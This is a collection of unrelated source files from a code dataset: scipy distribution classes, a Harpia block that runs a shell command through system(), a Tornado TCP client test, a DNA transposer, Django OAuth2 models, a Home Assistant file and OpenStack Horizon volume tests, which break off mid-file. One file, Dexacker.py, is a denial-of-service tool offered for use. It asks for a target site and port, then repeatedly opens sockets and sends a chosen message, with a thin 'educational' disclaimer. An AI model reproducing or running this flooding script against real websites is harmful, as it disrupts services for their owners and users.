%(after_notes)s
.. versionadded:: 0.19.0
%(example)s
"""
def _pdf(self, x, chi):
"""
Return PDF of the argus function
argus.pdf(x, chi) = chi**3 / (sqrt(2*pi) * Psi(chi)) * x *
sqrt(1-x**2) * exp(- 0.5 * chi**2 * (1 - x**2))
"""
y = 1.0 - x**2
return chi**3 / (_norm_pdf_C * _argus_phi(chi)) * x * np.sqrt(y) * np.exp(-chi**2 * y / 2)
def _cdf(self, x, chi):
"""
Return CDF of the argus function
"""
return 1.0 - self._sf(x, chi)
def _sf(self, x, chi):
"""
Return survival function of the argus function
"""
return _argus_phi(chi * np.sqrt(1 - x**2)) / _argus_phi(chi)
argus = argus_gen(name='argus', longname="An Argus Function", a=0.0, b=1.0)
class rv_histogram(rv_continuous):
"""
Generates a distribution given by a histogram.
This is useful to generate a template distribution from a binned
datasample.
As a subclass of the `rv_continuous` class, `rv_histogram` inherits from it
a collection of generic methods (see `rv_continuous` for the full list),
and implements them based on the properties of the provided binned
datasample.
Parameters
----------
histogram : tuple of array_like
Tuple containing two array_like objects
The first containing the content of n bins
The second containing the (n+1) bin boundaries
In particular the return value np.histogram is accepted
Notes
-----
There are no additional shape parameters except for the loc and scale.
The pdf is defined as a stepwise function from the provided histogram
The cdf is a linear interpolation of the pdf.
.. versionadded:: 0.19.0
Examples
--------
Create a scipy.stats distribution from a numpy histogram
>>> import scipy.stats
>>> import numpy as np
>>> data = scipy.stats.norm.rvs(size=100000, loc=0, scale=1.5, random_state=123)
>>> hist = np.histogram(data, bins=100)
>>> hist_dist = scipy.stats.rv_histogram(hist)
Behaves like an ordinary scipy rv_continuous distribution
>>> hist_dist.pdf(1.0)
0.20538577847618705
>>> hist_dist.cdf(2.0)
0.90818568543056499
PDF is zero above (below) the highest (lowest) bin of the histogram,
defined by the max (min) of the original dataset
>>> hist_dist.pdf(np.max(data))
0.0
>>> hist_dist.cdf(np.max(data))
1.0
>>> hist_dist.pdf(np.min(data))
7.7591907244498314e-05
>>> hist_dist.cdf(np.min(data))
0.0
PDF and CDF follow the histogram
>>> import matplotlib.pyplot as plt
>>> X = np.linspace(-5.0, 5.0, 100)
>>> plt.title("PDF from Template")
>>> plt.hist(data, density=True, bins=100)
>>> plt.plot(X, hist_dist.pdf(X), label='PDF')
>>> plt.plot(X, hist_dist.cdf(X), label='CDF')
>>> plt.show()
"""
_support_mask = rv_continuous._support_mask
def __init__(self, histogram, *args, **kwargs):
"""
Create a new distribution using the given histogram
Parameters
----------
histogram : tuple of array_like
Tuple containing two array_like objects
The first containing the content of n bins
The second containing the (n+1) bin boundaries
In particular the return value np.histogram is accepted
"""
self._histogram = histogram
if len(histogram) != 2:
raise ValueError("Expected length 2 for parameter histogram")
self._hpdf = np.asarray(histogram[0])
self._hbins = np.asarray(histogram[1])
if len(self._hpdf) + 1 != len(self._hbins):
raise ValueError("Number of elements in histogram content "
"and histogram boundaries do not match, "
"expected n and n+1.")
self._hbin_widths = self._hbins[1:] - self._hbins[:-1]
self._hpdf = self._hpdf / float(np.sum(self._hpdf * self._hbin_widths))
self._hcdf = np.cumsum(self._hpdf * self._hbin_widths)
self._hpdf = np.hstack([0.0, self._hpdf, 0.0])
self._hcdf = np.hstack([0.0, self._hcdf])
# Set support
kwargs['a'] = self.a = self._hbins[0]
kwargs['b'] = self.b = self._hbins[-1]
super(rv_histogram, self).__init__(*args, **kwargs)
def _pdf(self, x):
"""
PDF of the histogram
"""
return self._hpdf[np.searchsorted(self._hbins, x, side='right')]
def _cdf(self, x):
"""
CDF calculated from the histogram
"""
return np.interp(x, self._hbins, self._hcdf)
def _ppf(self, x):
"""
Percentile function calculated from the histogram
"""
return np.interp(x, self._hcdf, self._hbins)
def _munp(self, n):
"""Compute the n-th non-central moment."""
integrals = (self._hbins[1:]**(n+1) - self._hbins[:-1]**(n+1)) / (n+1)
return np.sum(self._hpdf[1:-1] * integrals)
def _entropy(self):
"""Compute entropy of distribution"""
res = _lazywhere(self._hpdf[1:-1] > 0.0,
(self._hpdf[1:-1],),
np.log,
0.0)
return -np.sum(self._hpdf[1:-1] * res * self._hbin_widths)
def _updated_ctor_param(self):
"""
Set the histogram as additional constructor argument
"""
dct = super(rv_histogram, self)._updated_ctor_param()
dct['histogram'] = self._histogram
return dct
# Collect names of classes and objects in this module.
pairs = list(globals().items())
_distn_names, _distn_gen_names = get_distribution_names(pairs, rv_continuous)
__all__ = _distn_names + _distn_gen_names + ['rv_histogram']
|
gertingold/scipy
|
scipy/stats/_continuous_distns.py
|
Python
|
bsd-3-clause
| 220,936 | 0.000751 |
# -*- coding: utf-8 -*-
# [HARPIA PROJECT]
#
#
# S2i - Intelligent Industrial Systems
# DAS - Automation and Systems Department
# UFSC - Federal University of Santa Catarina
# Copyright: 2006 - 2007 Luis Carlos Dill Junges (lcdjunges@yahoo.com.br), Clovis Peruchi Scotti (scotti@ieee.org),
# Guilherme Augusto Rutzen (rutzen@das.ufsc.br), Mathias Erdtmann (erdtmann@gmail.com) and S2i (www.s2i.das.ufsc.br)
# 2007 - 2009 Clovis Peruchi Scotti (scotti@ieee.org), S2i (www.s2i.das.ufsc.br)
#
#
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 3, as published
# by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranties of
# MERCHANTABILITY, SATISFACTORY QUALITY, or FITNESS FOR A PARTICULAR
# PURPOSE. See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program. If not, see <http://www.gnu.org/licenses/>.
#
# For further information, check the COPYING file distributed with this software.
#
# ----------------------------------------------------------------------
import gtk
from harpia.GladeWindow import GladeWindow
from harpia.s2icommonproperties import S2iCommonProperties, APP, DIR
# i18n
import os
from harpia.utils.XMLUtils import XMLParser
import gettext
_ = gettext.gettext
gettext.bindtextdomain(APP, DIR)
gettext.textdomain(APP)
# ----------------------------------------------------------------------
class Properties(GladeWindow, S2iCommonProperties):
# ----------------------------------------------------------------------
def __init__(self, PropertiesXML, S2iBlockProperties):
self.m_sDataDir = os.environ['HARPIA_DATA_DIR']
filename = self.m_sDataDir + 'glade/runCmd.ui'
self.m_oPropertiesXML = PropertiesXML
self.m_oS2iBlockProperties = S2iBlockProperties
widget_list = [
'Properties',
'cmdString',
'BackgroundColor',
'BorderColor',
'HelpView',
'enIsntZero'
]
handlers = [
'on_cancel_clicked',
'on_prop_confirm_clicked',
'on_BackColorButton_clicked',
'on_BorderColorButton_clicked'
]
top_window = 'Properties'
GladeWindow.__init__(self, filename, top_window, widget_list, handlers)
# load properties values
self.block_properties = self.m_oPropertiesXML.getTag("properties").getTag("block").getChildTags("property")
for Property in self.block_properties:
if Property.name == "cmdString":
self.widgets['cmdString'].set_text(Property.value)
if Property.name == "enIsntZero":
self.widgets['enIsntZero'].set_active(Property.value == "True")
self.configure()
# load help text
# t_oS2iHelp = XMLParser(self.m_sDataDir + "help/runCmd" + _("_en.help"))
# t_oTextBuffer = gtk.TextBuffer()
# t_oTextBuffer.set_text(unicode(str(t_oS2iHelp.getTag("help").getTag("content").getTagContent())))
# self.widgets['HelpView'].set_buffer(t_oTextBuffer)
#----------------Help Text--------------------------------------
def getHelp(self):#adicionado help
return "Executa uma chamada de sistema dependendo da avaliação binaria do pixel (0,0) da imagem de entrada."
# ----------------------------------------------------------------------
def __del__(self):
pass
# ----------------------------------------------------------------------
def on_prop_confirm_clicked(self, *args):
for Property in self.block_properties:
if Property.name == "cmdString":
Property.value = unicode(self.widgets['cmdString'].get_text())
if Property.name == "enIsntZero":
Property.value = unicode(self.widgets['enIsntZero'].get_active())
self.m_oS2iBlockProperties.SetPropertiesXML(self.m_oPropertiesXML)
self.m_oS2iBlockProperties.SetBorderColor(self.m_oBorderColor)
self.m_oS2iBlockProperties.SetBackColor(self.m_oBackColor)
self.widgets['Properties'].destroy()
# ----------------------------------------------------------------------
# propProperties = Properties()()
# propProperties.show( center=0 )
# ------------------------------------------------------------------------------
# Code generation
# ------------------------------------------------------------------------------
def generate(blockTemplate):
cmdString = 'echo no properties'
enIsntZero = False
for propIter in blockTemplate.properties:
if propIter[0] == 'cmdString':
cmdString = propIter[1]
if propIter[0] == 'enIsntZero':
enIsntZero = (propIter[1] == "True")
cmdString = cmdString.replace(r"'", r"\'")
cmdString = cmdString.replace(r'"', r'\"')
blockTemplate.imagesIO = \
'double block$$_double_i1;\n' + \
'double block$$_double_o1;\n'
blockTemplate.functionCall = '\nif('
if enIsntZero:
blockTemplate.functionCall += 'block$$_double_i1 > 0.0){\n'
else:
blockTemplate.functionCall += '1){\n'
blockTemplate.functionCall += 'char outPutStr[' + str(len(cmdString) + 30) + '];\n' + \
'snprintf(outPutStr,' + str(len(
cmdString) + 30) + ',"export HRP_DB=%f;' + cmdString + '",(float)block$$_double_i1);' + \
'system(outPutStr);}\n' + \
'block$$_double_o1 = block$$_double_i1;\n'
blockTemplate.dealloc = '//nothing to deallocate\n'
# ------------------------------------------------------------------------------
# Block Setup
# ------------------------------------------------------------------------------
def getBlock():
return {"Label": _("Run Command"),
"Path": {"Python": "runCmd",
"Glade": "glade/runCmd.ui",
"Xml": "xml/runCmd.xml"},
"Icon": "images/runCmd.png",
"Color": "200:200:60:150",
"InTypes": {0: "HRP_DOUBLE"},
"OutTypes": {0: "HRP_DOUBLE"},
"Description": _("Runs a shell command depending on the input value."),
"TreeGroup": _("Experimental")
}
|
Exterminus/harpia
|
harpia/bpGUI/runCmd.py
|
Python
|
gpl-2.0
| 6,533 | 0.002756 |
#coding=utf-8
#-*- encoding: utf-8 -*-
import tornado.ioloop
import tornado.iostream
import socket
import struct
import NotifyTCPServer
def readPacketHeader():
stream.read_bytes(NotifyTCPServer.PACKET_HEADER_LEN, parsePacketHeader)
def parsePacketHeader(data):
sign,cmd,bodySize = struct.unpack('>2sHH', data)
print "Sign: %s, Command: %s, Size: %s" % (sign,cmd,bodySize)
command=cmd
stream.read_bytes(bodySize, parsePacketBody)
def parsePacketBody(data):
print "Data: %s" % str(data)
if command == NotifyTCPServer.NOTIFY_COMMAND_PING:
send_ping(data)
readPacketHeader()
def send_register(userKey):
send_packet(NotifyTCPServer.NOTIFY_COMMAND_REGISTER, userKey)
def send_ping(msg):
send_packet(NotifyTCPServer.NOTIFY_COMMAND_PING, msg)
def send_packet(cmd, msg):
data = bytes(msg)
stream.write(struct.pack(">2sHH", "NT", cmd, len(data)))
stream.write(data)
def send_request():
readPacketHeader()
send_register('591410cbf9614cbf9aaac4a871ddb466')
command=0
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
stream = tornado.iostream.IOStream(s)
stream.connect(("localhost", 9002), send_request)
#stream.connect(("221.180.20.232", 9002), send_request)
tornado.ioloop.IOLoop.instance().start()
|
xaccc/videoapiserver
|
testNotifyTCPServer.py
|
Python
|
gpl-2.0
| 1,234 | 0.024311 |
#! /usr/bin/env python
import sys, os
sys.path.append('./include/python')
import proteomatic
import string
import re
class TransposeDna(proteomatic.ProteomaticScript):
def run(self):
# convert all characters to upper case
# Attention: parameters are Unicode because of the JSON parser
# used behind the scenes, convert nucleotides to ASCII string
dna = str(self.param['nucleotides']).upper()
# remove invalid characters
dna = re.sub('[^ACGT]', '', dna)
# reverse sequence
dna = dna[::-1]
# replace nucleotides
dna = dna.translate(string.maketrans('ACGT', 'TGCA'))
# output transposed DNA
print(dna)
if 'result' in self.output:
with open(self.output['result'], 'w') as f:
f.write(dna + "\n")
if __name__ == '__main__':
script = TransposeDna()
|
specht/proteomatic-scripts
|
transpose-dna.defunct.py
|
Python
|
gpl-3.0
| 911 | 0.009879 |
#-*- coding: utf-8 -*-
"""OAuth 2.0 Django Models"""
import time
from hashlib import sha512
from uuid import uuid4
from django.db import models
from django.contrib.auth.models import User
from .consts import CLIENT_KEY_LENGTH, CLIENT_SECRET_LENGTH
from .consts import SCOPE_LENGTH
from .consts import ACCESS_TOKEN_LENGTH, REFRESH_TOKEN_LENGTH
from .consts import ACCESS_TOKEN_EXPIRATION, MAC_KEY_LENGTH, REFRESHABLE
from .consts import CODE_KEY_LENGTH, CODE_EXPIRATION
from djangotoolbox.fields import ListField
class TimestampGenerator(object):
"""Callable Timestamp Generator that returns a UNIX time integer.
**Kwargs:**
* *seconds:* A integer indicating how many seconds in the future the
timestamp should be. *Default 0*
*Returns int*
"""
def __init__(self, seconds=0):
self.seconds = seconds
def __call__(self):
return int(time.time()) + self.seconds
class KeyGenerator(object):
"""Callable Key Generator that returns a random keystring.
**Args:**
* *length:* A integer indicating how long the key should be.
*Returns str*
"""
def __init__(self, length):
self.length = length
def __call__(self):
return sha512(uuid4().hex).hexdigest()[0:self.length]
class Client(models.Model):
"""Stores client authentication data.
**Args:**
* *name:* A string representing the client name.
* *user:* A django.contrib.auth.models.User object representing the client
owner.
**Kwargs:**
* *description:* A string representing the client description.
*Default None*
* *key:* A string representing the client key. *Default 30 character
random string*
* *secret:* A string representing the client secret. *Default 30 character
random string*
* *redirect_uri:* A string representing the client redirect_uri.
*Default None*
"""
name = models.CharField(max_length=256)
user = models.ForeignKey(User)
description = models.TextField(null=True, blank=True)
key = models.CharField(
unique=True,
max_length=CLIENT_KEY_LENGTH,
default=KeyGenerator(CLIENT_KEY_LENGTH),
db_index=True)
secret = models.CharField(
unique=True,
max_length=CLIENT_SECRET_LENGTH,
default=KeyGenerator(CLIENT_SECRET_LENGTH))
redirect_uri = models.URLField(null=True)
class AccessRange(models.Model):
"""Stores access range data, also known as scope.
**Args:**
* *key:* A string representing the access range scope. Used in access
token requests.
**Kwargs:**
* *description:* A string representing the access range description.
*Default None*
"""
key = models.CharField(unique=True, max_length=SCOPE_LENGTH, db_index=True)
description = models.TextField(blank=True)
class AccessToken(models.Model):
"""Stores access token data.
**Args:**
* *client:* A oauth2app.models.Client object
* *user:* A django.contrib.auth.models.User object
**Kwargs:**
* *token:* A string representing the access key token. *Default 10
character random string*
* *refresh_token:* A string representing the access key token. *Default 10
character random string*
* *mac_key:* A string representing the MAC key. *Default None*
* *expire:* A positive integer timestamp representing the access token's
expiration time.
* *scope:* A list of oauth2app.models.AccessRange objects. *Default None*
* *refreshable:* A boolean that indicates whether this access token is
refreshable. *Default False*
"""
client = models.ForeignKey(Client)
user = models.ForeignKey(User)
token = models.CharField(
unique=True,
max_length=ACCESS_TOKEN_LENGTH,
default=KeyGenerator(ACCESS_TOKEN_LENGTH),
db_index=True)
refresh_token = models.CharField(
unique=True,
blank=True,
null=True,
max_length=REFRESH_TOKEN_LENGTH,
default=KeyGenerator(REFRESH_TOKEN_LENGTH),
db_index=True)
mac_key = models.CharField(
blank=True,
null=True,
max_length=MAC_KEY_LENGTH,
default=None)
issue = models.PositiveIntegerField(
editable=False,
default=TimestampGenerator())
expire = models.PositiveIntegerField(
default=TimestampGenerator(ACCESS_TOKEN_EXPIRATION))
scope = ListField()
refreshable = models.BooleanField(default=REFRESHABLE)
class Code(models.Model):
"""Stores authorization code data.
**Args:**
* *client:* A oauth2app.models.Client object
* *user:* A django.contrib.auth.models.User object
**Kwargs:**
* *key:* A string representing the authorization code. *Default 30
character random string*
* *expire:* A positive integer timestamp representing the access token's
expiration time.
* *redirect_uri:* A string representing the redirect_uri provided by the
requesting client when the code was issued. *Default None*
* *scope:* A list of oauth2app.models.AccessRange objects. *Default None*
"""
client = models.ForeignKey(Client)
user = models.ForeignKey(User)
key = models.CharField(
unique=True,
max_length=CODE_KEY_LENGTH,
default=KeyGenerator(CODE_KEY_LENGTH),
db_index=True)
issue = models.PositiveIntegerField(
editable=False,
default=TimestampGenerator())
expire = models.PositiveIntegerField(
default=TimestampGenerator(CODE_EXPIRATION))
redirect_uri = models.URLField(null=True)
scope = ListField()
class MACNonce(models.Model):
"""Stores Nonce strings for use with MAC Authentication.
**Args:**
* *access_token:* A oauth2app.models.AccessToken object
* *nonce:* A unique nonce string.
"""
access_token = models.ForeignKey(AccessToken)
nonce = models.CharField(max_length=30, db_index=True)
|
xrage/oauth2app-mongoDb
|
oauth2app/models.py
|
Python
|
mit
| 5,945 | 0.000168 |
#!/usr/bin/env python
#______________________________________#
#Dexacker is an open source tool developed by Abdelmadjd Cherfaoui
#Dexacker is designed for Educational Stuff to do a LEGAL DDOS Test and the developers is
# not responsible for ILLEGAL USES
#Contacting using:@Hexacker | fb.com/Hexacker
#http://www.hackercademy.com
#http://www.bringitsimple.com
#______________________________________#
#Importing Modules
import socket,os,sys,string
#Lunching Tool
print "Lunching Dexacker..."
print "Remember that Dexacker is an Educational Tool\nand you are responsible for any ILLEGAL USES\nThe Developer is not responsible for your behaviors "
#Default Settings
host = raw_input("Enter the website link you want to DDOS it: ")
port = int(raw_input("Enter the port you want to Attack: "))
message = raw_input("Write the message you want to send it: ")
connections = int(raw_input("How many beat you want to make: " ))
IP = socket.gethostbyname(host)
#/
#The Attacking Function
def Attack():
attack = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
attack.connect((host,80))
attack.send(message)
attack.sendto(message, (IP,port))
attack.send(message);
except socket.error,msg:
print "Connection Failed"
print "DDOS Attack Lunched"
attack.close()
for i in range(1,connections):
Attack()
print "______________________________________"
print "The Operation is finished"
#this is the restaring function
def Restart():
program = sys.executable
os.execl(program,program,* sys.argv)
CurDirectory = os.getcwd()
if __name__ == "__main__":
request = raw_input("Do you start over? Y or N :")
if request.strip() in "y Y yes Yes YES YEs yES".split():
Restart()
else:
os.system(CurDirectory+"Dexacker.py")
|
Hexacker/Dexacker
|
Dexacker.py
|
Python
|
gpl-2.0
| 1,733 | 0.030006 |
"""Describe group states."""
from homeassistant.components.group import GroupIntegrationRegistry
from homeassistant.const import STATE_OK, STATE_PROBLEM
from homeassistant.core import HomeAssistant, callback
@callback
def async_describe_on_off_states(
hass: HomeAssistant, registry: GroupIntegrationRegistry
) -> None:
"""Describe group on off states."""
registry.on_off_states({STATE_PROBLEM}, STATE_OK)
|
jawilson/home-assistant
|
homeassistant/components/plant/group.py
|
Python
|
apache-2.0
| 421 | 0 |
# Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import django
from django.conf import settings
from django.core.urlresolvers import reverse
from django.forms import widgets
from django import http
from mox import IsA # noqa
from openstack_dashboard import api
from openstack_dashboard.api import cinder
from openstack_dashboard.dashboards.project.volumes \
.volumes import tables
from openstack_dashboard.test import helpers as test
from openstack_dashboard.usage import quotas
VOLUME_INDEX_URL = reverse('horizon:project:volumes:index')
VOLUME_VOLUMES_TAB_URL = reverse('horizon:project:volumes:volumes_tab')
class VolumeViewTests(test.TestCase):
@test.create_stubs({cinder: ('volume_create',
'volume_snapshot_list',
'volume_type_list',
'volume_list',
'availability_zone_list',
'extension_supported'),
api.glance: ('image_list_detailed',),
quotas: ('tenant_limit_usages',)})
def test_create_volume(self):
volume = self.cinder_volumes.first()
volume_type = self.volume_types.first()
az = self.cinder_availability_zones.first().zoneName
usage_limit = {'maxTotalVolumeGigabytes': 250,
'gigabytesUsed': 20,
'volumesUsed': len(self.cinder_volumes.list()),
'maxTotalVolumes': 6}
formData = {'name': u'A Volume I Am Making',
'description': u'This is a volume I am making for a test.',
'method': u'CreateForm',
'type': volume_type.name,
'size': 50,
'snapshot_source': '',
'availability_zone': az}
cinder.volume_type_list(IsA(http.HttpRequest)).\
AndReturn(self.volume_types.list())
quotas.tenant_limit_usages(IsA(http.HttpRequest)).\
AndReturn(usage_limit)
cinder.volume_snapshot_list(IsA(http.HttpRequest)).\
AndReturn(self.cinder_volume_snapshots.list())
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'is_public': True,
'status': 'active'}) \
.AndReturn([self.images.list(), False, False])
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'property-owner_id': self.tenant.id,
'status': 'active'}) \
.AndReturn([[], False, False])
cinder.availability_zone_list(IsA(http.HttpRequest)).AndReturn(
self.cinder_availability_zones.list())
cinder.extension_supported(IsA(http.HttpRequest), 'AvailabilityZones')\
.AndReturn(True)
cinder.volume_list(IsA(
http.HttpRequest)).AndReturn(self.cinder_volumes.list())
cinder.volume_create(IsA(http.HttpRequest),
formData['size'],
formData['name'],
formData['description'],
formData['type'],
metadata={},
snapshot_id=None,
image_id=None,
availability_zone=formData['availability_zone'],
source_volid=None)\
.AndReturn(volume)
self.mox.ReplayAll()
url = reverse('horizon:project:volumes:volumes:create')
res = self.client.post(url, formData)
redirect_url = VOLUME_VOLUMES_TAB_URL
self.assertRedirectsNoFollow(res, redirect_url)
@test.create_stubs({cinder: ('volume_create',
'volume_snapshot_list',
'volume_type_list',
'volume_list',
'availability_zone_list',
'extension_supported'),
api.glance: ('image_list_detailed',),
quotas: ('tenant_limit_usages',)})
def test_create_volume_dropdown(self):
volume = self.cinder_volumes.first()
usage_limit = {'maxTotalVolumeGigabytes': 250,
'gigabytesUsed': 20,
'volumesUsed': len(self.cinder_volumes.list()),
'maxTotalVolumes': 6}
formData = {'name': u'A Volume I Am Making',
'description': u'This is a volume I am making for a test.',
'method': u'CreateForm',
'size': 50,
'type': '',
'volume_source_type': 'no_source_type',
'snapshot_source': self.cinder_volume_snapshots.first().id,
'image_source': self.images.first().id}
cinder.volume_type_list(IsA(http.HttpRequest)).\
AndReturn(self.volume_types.list())
cinder.volume_snapshot_list(IsA(http.HttpRequest)).\
AndReturn(self.cinder_volume_snapshots.list())
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'is_public': True,
'status': 'active'}) \
.AndReturn([self.images.list(), False, False])
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'property-owner_id': self.tenant.id,
'status': 'active'}) \
.AndReturn([[], False, False])
cinder.volume_list(IsA(
http.HttpRequest)).AndReturn(self.cinder_volumes.list())
quotas.tenant_limit_usages(IsA(http.HttpRequest)).\
AndReturn(usage_limit)
cinder.extension_supported(IsA(http.HttpRequest), 'AvailabilityZones')\
.AndReturn(True)
cinder.availability_zone_list(IsA(http.HttpRequest)).AndReturn(
self.cinder_availability_zones.list())
cinder.volume_create(IsA(http.HttpRequest),
formData['size'],
formData['name'],
formData['description'],
'',
metadata={},
snapshot_id=None,
image_id=None,
availability_zone=None,
source_volid=None).AndReturn(volume)
self.mox.ReplayAll()
url = reverse('horizon:project:volumes:volumes:create')
res = self.client.post(url, formData)
redirect_url = VOLUME_VOLUMES_TAB_URL
self.assertRedirectsNoFollow(res, redirect_url)
@test.create_stubs({cinder: ('volume_create',
'volume_snapshot_get',
'volume_get',
'volume_type_list'),
quotas: ('tenant_limit_usages',)})
def test_create_volume_from_snapshot(self):
volume = self.cinder_volumes.first()
usage_limit = {'maxTotalVolumeGigabytes': 250,
'gigabytesUsed': 20,
'volumesUsed': len(self.cinder_volumes.list()),
'maxTotalVolumes': 6}
snapshot = self.cinder_volume_snapshots.first()
formData = {'name': u'A Volume I Am Making',
'description': u'This is a volume I am making for a test.',
'method': u'CreateForm',
'size': 50,
'type': '',
'snapshot_source': snapshot.id}
cinder.volume_type_list(IsA(http.HttpRequest)).\
AndReturn(self.volume_types.list())
quotas.tenant_limit_usages(IsA(http.HttpRequest)).\
AndReturn(usage_limit)
cinder.volume_snapshot_get(IsA(http.HttpRequest),
str(snapshot.id)).AndReturn(snapshot)
cinder.volume_get(IsA(http.HttpRequest), snapshot.volume_id).\
AndReturn(self.cinder_volumes.first())
cinder.volume_create(IsA(http.HttpRequest),
formData['size'],
formData['name'],
formData['description'],
'',
metadata={},
snapshot_id=snapshot.id,
image_id=None,
availability_zone=None,
source_volid=None).AndReturn(volume)
self.mox.ReplayAll()
# get snapshot from url
url = reverse('horizon:project:volumes:volumes:create')
res = self.client.post("?".join([url,
"snapshot_id=" + str(snapshot.id)]),
formData)
redirect_url = VOLUME_VOLUMES_TAB_URL
self.assertRedirectsNoFollow(res, redirect_url)
@test.create_stubs({cinder: ('volume_create',
'volume_get',
'volume_list',
'volume_type_list',
'availability_zone_list',
'volume_snapshot_get',
'volume_snapshot_list',
'extension_supported'),
api.glance: ('image_list_detailed',),
quotas: ('tenant_limit_usages',)})
def test_create_volume_from_volume(self):
volume = self.cinder_volumes.first()
usage_limit = {'maxTotalVolumeGigabytes': 250,
'gigabytesUsed': 20,
'volumesUsed': len(self.cinder_volumes.list()),
'maxTotalVolumes': 6}
formData = {'name': u'A copy of a volume',
'description': u'This is a volume I am making for a test.',
'method': u'CreateForm',
'size': 50,
'type': '',
'volume_source_type': 'volume_source',
'volume_source': volume.id}
cinder.volume_list(IsA(http.HttpRequest)).\
AndReturn(self.cinder_volumes.list())
cinder.volume_type_list(IsA(http.HttpRequest)).\
AndReturn(self.volume_types.list())
cinder.volume_snapshot_list(IsA(http.HttpRequest)).\
AndReturn(self.cinder_volume_snapshots.list())
quotas.tenant_limit_usages(IsA(http.HttpRequest)).\
AndReturn(usage_limit)
cinder.volume_get(IsA(http.HttpRequest),
volume.id).AndReturn(self.cinder_volumes.first())
cinder.extension_supported(IsA(http.HttpRequest),
'AvailabilityZones').AndReturn(True)
cinder.availability_zone_list(IsA(http.HttpRequest)).AndReturn(
self.cinder_availability_zones.list())
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'is_public': True,
'status': 'active'}) \
.AndReturn([self.images.list(), False, False])
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'property-owner_id': self.tenant.id,
'status': 'active'}) \
.AndReturn([[], False, False])
cinder.volume_create(IsA(http.HttpRequest),
formData['size'],
formData['name'],
formData['description'],
'',
metadata={},
snapshot_id=None,
image_id=None,
availability_zone=None,
source_volid=volume.id).AndReturn(volume)
self.mox.ReplayAll()
url = reverse('horizon:project:volumes:volumes:create')
redirect_url = VOLUME_VOLUMES_TAB_URL
res = self.client.post(url, formData)
self.assertNoFormErrors(res)
self.assertMessageCount(info=1)
self.assertRedirectsNoFollow(res, redirect_url)
@test.create_stubs({cinder: ('volume_create',
'volume_snapshot_list',
'volume_snapshot_get',
'volume_get',
'volume_list',
'volume_type_list',
'availability_zone_list',
'extension_supported'),
api.glance: ('image_list_detailed',),
quotas: ('tenant_limit_usages',)})
def test_create_volume_from_snapshot_dropdown(self):
volume = self.cinder_volumes.first()
usage_limit = {'maxTotalVolumeGigabytes': 250,
'gigabytesUsed': 20,
'volumesUsed': len(self.cinder_volumes.list()),
'maxTotalVolumes': 6}
snapshot = self.cinder_volume_snapshots.first()
formData = {'name': u'A Volume I Am Making',
'description': u'This is a volume I am making for a test.',
'method': u'CreateForm',
'size': 50,
'type': '',
'volume_source_type': 'snapshot_source',
'snapshot_source': snapshot.id}
cinder.volume_type_list(IsA(http.HttpRequest)).\
AndReturn(self.volume_types.list())
cinder.volume_snapshot_list(IsA(http.HttpRequest)).\
AndReturn(self.cinder_volume_snapshots.list())
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'is_public': True,
'status': 'active'}) \
.AndReturn([self.images.list(), False, False])
api.glance.image_list_detailed(IsA(http.HttpRequest),
filters={'property-owner_id': self.tenant.id,
'status': 'active'}) \
.AndReturn([[], False, False])
cinder.volume_list(IsA(
http.HttpRequest)).AndReturn(self.cinder_volumes.list())
quotas.tenant_limit_usages(IsA(http.HttpRequest)).\
AndReturn(usage_limit)
cinder.volume_snapshot_get(IsA(http.HttpRequest),
str(snapshot.id)).AndReturn(snapshot)
cinder.extension_supported(IsA(http.HttpRequest), 'AvailabilityZones')\
.AndReturn(True)
cinder.availability_zone_list(IsA(http.HttpRequest)).AndReturn(
self.cinder_availability_zones.list())
cinder.volume_create(IsA(http.HttpRequest),
formData['size'],
formData['name'],
formData['description'],
'',
metadata={},
snapshot_id=snapshot.id,
image_id=None,
availability_zone=None,
source_volid=None).AndReturn(volume)
self.mox.ReplayAll()
# get snapshot from dropdown list
url = reverse('horizon:project:volumes:volumes:create')
res = self.client.post(url, formData)
redirect_url = VOLUME_VOLUMES_TAB_URL
self.assertRedirectsNoFollow(res, redirect_url)
@test.create_stubs({cinder: ('volume_snapshot_get',
'volume_type_list',
'volume_get'),
api.glance: ('image_list_detailed',),
quotas: ('tenant_limit_usages',)})
def test_create_volume_from_snapshot_invalid_size(self):
usage_limit = {'maxTotalVolumeGigabytes': 100,
'gigabytesUsed': 20,
'volumesUsed': len(self.cinder_volumes.list()),
'maxTotalVolumes': 6}
snapshot = self.cinder_volume_snapshots.first()
formData = {'name': u'A Volume I Am Making',
'description': u'This is a volume I am making for a test.',
'method': u'CreateForm',
'size': 20, 'snapshot_source': snapshot.id}
cinder.volume_type_list(IsA(http.HttpRequest)).\
AndReturn(self.volume_types.list())
quotas.tenant_limit_usages(IsA(http.HttpRequest)).\
AndReturn(usage_limit)
cinder.volume_snapshot_get(IsA(http.HttpRequest),
str(snapshot.id)).AndReturn(snapshot)
cinder.volume_get(IsA(http.HttpRequest), snapshot.volume_id).\
AndReturn(self.cinder_volumes.first())
quotas.tenant_limit_usages(IsA(http.HttpRequest)).\
AndReturn(usage_limit)
self.mox.ReplayAll()
url = reverse('horizon:project:volumes:volumes:create')
res = self.client.post("?".join([url,
"snapshot_id=" + str(snapshot.id)]),
formData, follow=True)
self.assertEqual(res.redirect_chain, [])
self.assertFormError(res, 'form', None,
"The volume size cannot be less than the "
"snapshot size (40GB)")
@test.create_stubs({cinder: ('volume_create',
'volume_type_list',
'availability_zone_list',
'extension_supported'),
